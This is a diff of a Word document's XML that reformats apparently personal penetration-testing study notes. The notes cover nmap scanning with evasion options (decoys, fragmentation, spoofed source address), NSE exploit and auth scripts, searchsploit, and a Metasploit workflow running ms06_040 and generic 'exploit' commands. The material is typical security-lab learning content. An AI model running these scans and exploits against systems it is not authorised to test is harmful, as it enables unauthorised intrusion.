+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -</w:t>
+            </w:r>
+            <w:r>
+              <w:t>O</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
           <w:p>
             <w:pPr>
               <w:rPr>
@@ -1937,216 +1766,41 @@
                 <w:bCs/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>Discovering Target Operating System</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:r>
-              <w:t>O</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
               <w:t>Detecting service version on port</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -A {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo nmap -A {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>nmap -sn {ipaddress}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -2160,21 +1814,12 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -p</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2195,23 +1840,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2260,29 +1889,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -f {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">} </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -2303,7 +1911,6 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2316,15 +1923,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">flood </w:t>
+              <w:t xml:space="preserve">(flood </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2343,57 +1942,27 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>{ipaddress}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -sS</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2406,15 +1975,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">flood – when scanning </w:t>
+              <w:t xml:space="preserve">(flood – when scanning </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2433,58 +1994,10 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, D {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2531,29 +2044,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Pn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -e</w:t>
+            <w:r>
+              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2624,27 +2116,12 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">Sudo </w:t>
+            </w:r>
+            <w:r>
+              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2661,35 +2138,14 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2700,29 +2156,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2731,29 +2166,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2778,19 +2192,9 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>Sudo nmap</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2801,32 +2205,11 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>anon.nse</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.175</w:t>
+            <w:r>
+              <w:t>Sudo nmap –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2862,16 +2245,8 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>searchploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2893,37 +2268,8 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2935,15 +2281,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>vsftpd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 2.3.)</w:t>
+              <w:t>Find version (vsftpd 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2955,15 +2293,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Google it if </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>theres</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> already existing exploitation</w:t>
+              <w:t>Google it if theres already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2975,13 +2305,8 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {version}</w:t>
+            <w:r>
+              <w:t>Searchsploit {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3173,21 +2498,12 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Metaploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Framework Structure</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit Framework Structure</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3218,23 +2534,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Cd /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>usr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>/share/Metasploit-framework</w:t>
+              <w:t>Cd /usr/share/Metasploit-framework</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3283,7 +2583,6 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -3291,23 +2590,14 @@
               </w:rPr>
               <w:t>msfconsole</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">to </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t xml:space="preserve">trigger </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> in</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> shell</w:t>
+              <w:t xml:space="preserve">to trigger </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> in shell</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">  </w:t>
@@ -3375,15 +2665,7 @@
               <w:t>Use exploit/</w:t>
             </w:r>
             <w:r>
-              <w:t>windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/ms06_040.netapi</w:t>
+              <w:t>windows/smb/ms06_040.netapi</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3465,14 +2747,12 @@
             <w:r>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>paypload</w:t>
             </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3563,52 +2843,362 @@
           </w:tcPr>
           <w:p>
             <w:r>
+              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+            <w:r>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ear</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ch {</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> version </w:t>
+            </w:r>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use exploit/unix/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payploads or show options</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set target {number}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: exploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Netcat – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: nc -help</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Telnet</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: Searchsploit Linux tetnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: search Linux telnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: telnet {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
